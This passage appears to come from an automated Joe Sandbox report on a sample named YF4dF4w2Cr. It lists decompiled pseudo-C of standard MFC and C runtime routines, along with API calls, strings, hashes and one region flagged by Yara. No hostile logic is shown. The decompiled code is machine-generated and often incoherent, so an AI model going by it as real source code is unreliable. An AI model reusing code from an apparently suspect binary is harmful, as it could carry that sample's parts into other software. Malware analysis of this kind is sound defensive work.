                  					_t77 =  *((intOrPtr*)(_t127 + 0x78));
                  					if( *(_t127 + 0x74) > _t100) {
                  						_t122 = _t77 + 0x10;
                  						do {
                  							_t144 =  *(_t122 - 4) & 0x00000001;
                  							if(( *(_t122 - 4) & 0x00000001) != 0) {
                  								_push(1);
                  								_push( *_t122);
                  								_push(_t100);
                  								_t77 = E0040BE87(_t100, _t127, _t118, _t122, _t127, _t144);
                  							}
                  							_t122 = _t122 + 0x14;
                  							_t100 = _t100 + 1;
                  						} while (_t100 <  *(_t127 + 0x74));
                  					}
                  				}
                  				return E00431B73(_t77);
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$H_prolog3OffsetWindow
                  • String ID: XE
                  • API String ID: 587651453-1251649612
                  • Opcode ID: 8c65d8e29cee3d10715b3d07ffeddea803d4f919f722eecb94ccc229256a07a0
                  • Instruction ID: 6f3991411b2553dd1bfb6b8d3d00d373c4bb3f81e6964f08e69918648d58cc0c
                  • Opcode Fuzzy Hash: 8c65d8e29cee3d10715b3d07ffeddea803d4f919f722eecb94ccc229256a07a0
                  • Instruction Fuzzy Hash: EA516C7190060ADFDB15CFE8C9C5AAEBBB1FF04304F20462EEA56B7291DB34A944CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00411D22(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				char _v48;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t33;
                  				intOrPtr* _t35;
                  				intOrPtr* _t36;
                  				void* _t38;
                  				intOrPtr* _t52;
                  				void* _t54;
                  				intOrPtr _t55;
                  				void* _t58;
                  				void* _t60;
                  				intOrPtr _t62;
                  
                  				_t62 = E0041EDAB(_t54, _t58, _t60, __eflags) + 0x7c;
                  				_t55 =  *((intOrPtr*)(E0041F363(_t54, _t58, _t62, __eflags) + 8));
                  				if(_a8 != 0 || _a12 != 0) {
                  					L4:
                  					_v8 =  *((intOrPtr*)(E00431D3E(__eflags)));
                  					_t33 = E00431D3E(__eflags);
                  					_push(_a16);
                  					 *_t33 = 0;
                  					_push(_a12);
                  					_push(_a8);
                  					_push(_a4);
                  					E00431BC3(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
                  					goto L5;
                  				} else {
                  					_t69 = _a16;
                  					if(_a16 != 0) {
                  						goto L4;
                  					}
                  					_v8 =  *((intOrPtr*)(E00431D3E(_t69)));
                  					_t52 = E00431D3E(_t69);
                  					_push(_a4);
                  					 *_t52 = 0;
                  					E00431BC3(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
                  					L5:
                  					_t35 = E00431D3E(_t69);
                  					_t70 =  *_t35;
                  					if( *_t35 == 0) {
                  						_t36 = E00431D3E(__eflags);
                  						_t57 = _v8;
                  						 *_t36 = _v8;
                  					} else {
                  						E00405B7A( *((intOrPtr*)(E00431D3E(_t70))));
                  						_pop(_t57);
                  					}
                  					_push( &_v48);
                  					_push(_t62);
                  					_push(_t55);
                  					_t38 = E004086B0(_t55, _t57, 0, _t62, _t70);
                  					_t71 = _t38;
                  					if(_t38 == 0) {
                  						_v48 = _a4;
                  						_v44 = DefWindowProcA;
                  						_v28 = _a16;
                  						_v24 = _a8;
                  						_v20 = _a12;
                  						_push( &_v48);
                  						_v36 = 0;
                  						_v40 = 0;
                  						_v32 = _t55;
                  						_v16 = 0;
                  						_v12 = _t62;
                  						if(E00411C95(_t55, _t57, 0, _t62, _t71) == 0) {
                  							E0042280E(_t57);
                  						}
                  					}
                  					return _t62;
                  				}
                  			}

                  APIs
                  • __snwprintf_s.LIBCMT ref: 00411D6F
                    • Part of subcall function 00431BC3: __vsnprintf_s_l.LIBCMT ref: 00431BDA
                  • __snwprintf_s.LIBCMT ref: 00411DA1
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __snwprintf_s$__getptd_noexit__vsnprintf_s_l
                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                  • API String ID: 3087765582-2801496823
                  • Opcode ID: 79ab1c3d637c257384c0f0185b47a48001210397112bccdcd7fd088eacc47a1d
                  • Instruction ID: 1d495ebfd1f961796ff5d03d660c62335177aa144dd98908c007a65705bb3054
                  • Opcode Fuzzy Hash: 79ab1c3d637c257384c0f0185b47a48001210397112bccdcd7fd088eacc47a1d
                  • Instruction Fuzzy Hash: 14318375E00208AFCB11EFA6D841ADE7BF8EF49354F10442BF914A7361E7389951CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A558
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ,"E$$DKM]$g{2=
                  • API String ID: 1029625771-544385820
                  • Opcode ID: 1e0d458655c799f3378c465b13394277e0f07ff60eb357dcbb3b163f2b3d19bf
                  • Instruction ID: 54d2279cc7c01944972aa02f38927970c123a4dfaa1a84162971d3f8fcdb7594
                  • Opcode Fuzzy Hash: 1e0d458655c799f3378c465b13394277e0f07ff60eb357dcbb3b163f2b3d19bf
                  • Instruction Fuzzy Hash: 5051C9B4C05369CBEB24DF919A81BCDBB71BB00304F608699C5693B315DB700A86CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E00401F10(signed int _a4) {
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				signed int _t13;
                  				signed int _t14;
                  				signed int _t23;
                  				intOrPtr* _t25;
                  				signed int _t27;
                  				intOrPtr* _t30;
                  
                  				_t23 = _a4;
                  				if(_t23 > 0) {
                  					_t14 = _t13 | 0xffffffff;
                  					_t27 = _t14 % _t23;
                  					__eflags = _t14 / _t23 - 2;
                  					if(__eflags >= 0) {
                  						goto L2;
                  					} else {
                  						_a4 = 0;
                  						E00430B93( &_v12, _t27,  &_a4);
                  						_t25 =  &_v16;
                  						_v16 = 0x44ee2c;
                  						E00430CF4(_t25, 0x45abf8);
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						_t30 = _t25;
                  						E00430BE6(_t25, _t27, _v20);
                  						 *_t30 = 0x44ee2c;
                  						return _t30;
                  					}
                  				} else {
                  					_t23 = 0;
                  					L2:
                  					return E00404461(0, _t23 + _t23);
                  				}
                  			}

                  APIs
                  • std::exception::exception.LIBCMT ref: 00401F4A
                  • __CxxThrowException@8.LIBCMT ref: 00401F61
                  • std::exception::exception.LIBCMT ref: 00401F78
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: std::exception::exception$Exception@8Throw_malloc
                  • String ID: ,D
                  • API String ID: 2388904642-2732034087
                  • Opcode ID: 5a91244dc61db6b4960001abf83dbf608f453c14659f9fc0871eea721b21abe4
                  • Instruction ID: 8673c816494186eb5e8cec3c219452ea3debbcaea0862e8feb1ac87be8cd02ed
                  • Opcode Fuzzy Hash: 5a91244dc61db6b4960001abf83dbf608f453c14659f9fc0871eea721b21abe4
                  • Instruction Fuzzy Hash: 33F024B55083006BC308EFA5D551A5FB7A0AFC4B14F108E2FF55982181EB78E918C75F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E004103CD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				struct HINSTANCE__* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t25;
                  				void* _t26;
                  				void* _t27;
                  
                  				_t27 = __eflags;
                  				_t24 = __edi;
                  				_t21 = __ebx;
                  				E00424385(0xc);
                  				_push(E0040F587);
                  				_t26 = E004205C8(__ebx, 0x4664a8, __edi, _t25, _t27);
                  				_t28 = _t26;
                  				if(_t26 == 0) {
                  					E00406436(__ebx, 0x4664a8, __edi, _t26, _t28);
                  				}
                  				_t29 =  *(_t26 + 8);
                  				if( *(_t26 + 8) != 0) {
                  					L7:
                  					E004243F7(0xc);
                  					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
                  				} else {
                  					_push("hhctrl.ocx");
                  					_t16 = E0040D5D6(_t21, 0x4664a8, _t24, _t26, _t29);
                  					 *(_t26 + 4) = _t16;
                  					if(_t16 != 0) {
                  						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                  						 *(_t26 + 8) = _t17;
                  						__eflags = _t17;
                  						if(_t17 != 0) {
                  							goto L7;
                  						}
                  						FreeLibrary( *(_t26 + 4));
                  						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                  					}
                  					return 0;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                    • Part of subcall function 00424385: InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                    • Part of subcall function 00424385: LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 004205C8: __EH_prolog3_catch.LIBCMT ref: 004205CF
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00410416
                  • FreeLibrary.KERNEL32(?), ref: 00410426
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpA$hhctrl.ocx
                  • API String ID: 2853499158-63838506
                  • Opcode ID: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction ID: 2d4502df0f2be6acf12af82616466bd765ca29f1fd83309a5bbf0ced49f2de9c
                  • Opcode Fuzzy Hash: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction Fuzzy Hash: C101DF31240716BBDB216F62ED05B9B3A90EF00725F50C42BFD4AA6592DBB8D8D0C62D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00429E40(void** __ecx, intOrPtr _a4, intOrPtr _a8) {
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr _t7;
                  				void* _t8;
                  				signed int _t13;
                  				long _t20;
                  				void** _t24;
                  
                  				_t7 = _a8;
                  				_t24 = __ecx;
                  				_t20 = _t7 + 0x40;
                  				 *((intOrPtr*)(__ecx + 4)) = _t7;
                  				if(_t20 >= _t7) {
                  					_t8 = GlobalAlloc(0x40, _t20);
                  					 *_t24 = _t8;
                  					if(_t8 == 0) {
                  						goto L1;
                  					}
                  					_t22 = GlobalLock(_t8);
                  					E004059F9(_t10, _t24, _t22, _t24[1], _a4, _t24[1]);
                  					_t13 = E00429CD6(_t22);
                  					asm("sbb eax, eax");
                  					_t24[2] =  ~_t13 + 1;
                  					GlobalUnlock( *_t24);
                  					return 1;
                  				}
                  				L1:
                  				return 0;
                  			}











                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,?,({A,0042A0CC,?,00000000,?,?,00417B28,?), ref: 00429E5C
                  • GlobalLock.KERNEL32 ref: 00429E6A
                  • GlobalUnlock.KERNEL32(?,?,?,?,00417B28,?), ref: 00429E93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$AllocLockUnlock
                  • String ID: ({A
                  • API String ID: 3972497268-68099953
                  • Opcode ID: 539910cec0df4dc273f827e80377cc537fb231eed1920f1a78aa9b5fc57b8a86
                  • Instruction ID: 78985dd97654aa714ada66d8568104a7166f6ead4f49b098867bc33a613e7971
                  • Opcode Fuzzy Hash: 539910cec0df4dc273f827e80377cc537fb231eed1920f1a78aa9b5fc57b8a86
                  • Instruction Fuzzy Hash: 66F0AF76610211AFD711AF76DC08D6B7BECEB59711701483AFA5AC3240EA34D8018B65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E0043E7E7() {
                  				signed long long _v12;
                  				signed int _v20;
                  				signed long long _v28;
                  				signed char _t8;
                  
                  				_t8 = GetModuleHandleA("KERNEL32");
                  				if(_t8 == 0) {
                  					L6:
                  					_v20 =  *0x456108;
                  					_v28 =  *0x456100;
                  					asm("fsubr qword [ebp-0x18]");
                  					_v12 = _v28 / _v20 * _v20;
                  					asm("fld1");
                  					asm("fcomp qword [ebp-0x8]");
                  					asm("fnstsw ax");
                  					if((_t8 & 0x00000005) != 0) {
                  						return 0;
                  					} else {
                  						return 1;
                  					}
                  				} else {
                  					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                  					if(__eax == 0) {
                  						goto L6;
                  					} else {
                  						_push(0);
                  						return __eax;
                  					}
                  				}
                  			}








                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,00434742), ref: 0043E7EC
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043E7FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction ID: 47c6caf6fecddeb87b6d1ac5e622b5b37c24e015e1786739191dd9ee142ae4fe
                  • Opcode Fuzzy Hash: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction Fuzzy Hash: 5CF03030A00A09E2DF002BB6BC0E76F7A74BB84747FA204A1E591B11D6DF35C475D25A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004391D4(intOrPtr* __eax, intOrPtr __edi) {
                  				intOrPtr _t10;
                  				intOrPtr* _t12;
                  
                  				_t10 = __edi;
                  				if(__edi == 0 || __eax == 0) {
                  					return 0;
                  				} else {
                  					_t12 =  *__eax;
                  					if(_t12 != __edi) {
                  						 *__eax = __edi;
                  						E00439086(__edi);
                  						if(_t12 != 0) {
                  							E00439115(_t12);
                  							if( *_t12 == 0 && _t12 != 0x463b50) {
                  								E00438F3D(_t12);
                  							}
                  						}
                  					}
                  					return _t10;
                  				}
                  			}






                  APIs
                  • ___addlocaleref.LIBCMT ref: 004391E6
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 00439098
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390A5
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390B2
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390BF
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390CC
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390E8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(8BF4428D), ref: 004390F8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 0043910E
                  • ___removelocaleref.LIBCMT ref: 004391F1
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043912F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043913C
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439149
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439156
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439163
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043917F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043918F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 004391A5
                  • ___freetlocinfo.LIBCMT ref: 00439205
                    • Part of subcall function 00438F3D: ___free_lconv_mon.LIBCMT ref: 00438F83
                    • Part of subcall function 00438F3D: ___free_lconv_num.LIBCMT ref: 00438FA4
                    • Part of subcall function 00438F3D: ___free_lc_time.LIBCMT ref: 00439029
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                  • String ID: P;F
                  • API String ID: 467427115-821099583
                  • Opcode ID: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction ID: 61ced1987d1eff592f3a7abbb9b964a4908a5711a4a26ed9b6d79d1087f2f2aa
                  • Opcode Fuzzy Hash: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction Fuzzy Hash: 05E04F32501D22358E3629196410AABB2942F8E719F1A299BF834A7359EBEC4C8080AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424340(void* __eax, void* __ebx, void* __edx, void* __edi) {
                  				void* _t5;
                  
                  				_t5 = __eax;
                  				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
                  			}




                  0x00424340
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction ID: 41b635fbd72690f6c41e90ba14f5db02281b1f503569879f63f8d22cb9e6b9e6
                  • Opcode Fuzzy Hash: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction Fuzzy Hash: 75E086B27011245BC7206B6EFC8474AA26CEBC0361F57417BD94143261F3BD4840CEDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424341(void* __eax, void* __ebx, void* __edx, void* __edi) {
                  				void* _t5;
                  
                  				_t5 = __eax;
                  				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
                  			}




                  0x00424341
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction ID: 362583a6ec685c06e829ffb7026d3f7272e8230db339484b57aec9b72c79060d
                  • Opcode Fuzzy Hash: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction Fuzzy Hash: 50E0CDE2B452251BC7206A6EFCC464E6A5CDFC036071745BBD881D3111F3AD9840C5DF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00447642(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t27;
                  				void* _t29;
                  				intOrPtr* _t34;
                  				void* _t35;
                  
                  				_push(0x44);
                  				E00431A9B(E0044CAD4, __ebx, __edi, __esi);
                  				E00402CE0(_t35 - 0x28, "invalid string position");
                  				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                  				_t27 = _t35 - 0x50;
                  				E004475BB(_t27, _t35 - 0x28);
                  				E00430CF4(_t35 - 0x50, 0x45e5f0);
                  				asm("int3");
                  				_push(4);
                  				E00431A9B(E0044CAF7, __ebx, __edi, __esi);
                  				_t34 = _t27;
                  				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
                  				_t31 =  *((intOrPtr*)(_t35 + 8));
                  				E00430BE6(_t27, _t29,  *((intOrPtr*)(_t35 + 8)));
                  				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
                  				 *_t34 = 0x457ad0;
                  				E00402A50(_t34 + 0xc, _t31 + 0xc);
                  				return E00431B73(_t34);
                  			}








                  APIs
                  • __EH_prolog3.LIBCMT ref: 00447649
                  • std::bad_exception::bad_exception.LIBCMT ref: 00447666
                    • Part of subcall function 004475BB: std::runtime_error::runtime_error.LIBCPMT ref: 004475C6
                  • __CxxThrowException@8.LIBCMT ref: 00447674
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  • invalid string position, xrefs: 0044764E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                  • String ID: invalid string position
                  • API String ID: 3299838469-1799206989
                  • Opcode ID: 1c56fdadc764f7005dc437fd44bc4dd561a6b57bd94f01df6c57617825768c93
                  • Instruction ID: 8efb31a1f4fd71fc9066c04bb15f7d7726a4351cfc37228a92b574e661cbd2dd
                  • Opcode Fuzzy Hash: 1c56fdadc764f7005dc437fd44bc4dd561a6b57bd94f01df6c57617825768c93
                  • Instruction Fuzzy Hash: 85D0127195520CAADB04E6D1CC66FDD7378AB04319F14142BB601B6482EBFC5608C768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 40%
                  			E0041443A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				char _v284;
                  				intOrPtr _v288;
                  				RECT* _v292;
                  				struct tagRECT _v308;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t58;
                  				signed char _t65;
                  				signed int _t70;
                  				intOrPtr _t107;
                  				intOrPtr _t108;
                  				signed int _t113;
                  				signed int _t115;
                  				intOrPtr _t133;
                  				RECT* _t135;
                  				intOrPtr _t137;
                  				intOrPtr _t139;
                  				intOrPtr _t140;
                  				signed int _t145;
                  				void* _t146;
                  
                  				_t133 = __edx;
                  				_t109 = __ecx;
                  				_t143 = _t145;
                  				_t146 = _t145 - 0x130;
                  				_t58 =  *0x463404; // 0x38a11573
                  				_v8 = _t58 ^ _t145;
                  				_t139 = _a4;
                  				_t135 = _a8;
                  				_t107 = __ecx;
                  				_v288 = _t139;
                  				_v292 = _t135;
                  				_t149 = __ecx;
                  				if(__ecx == 0) {
                  					L2:
                  					E00406436(_t107, _t109, _t135, _t139, _t149);
                  				}
                  				if(_t139 == 0) {
                  					goto L2;
                  				}
                  				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v308);
                  				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v308, _t135) == 0) {
                  					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
                  						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
                  					}
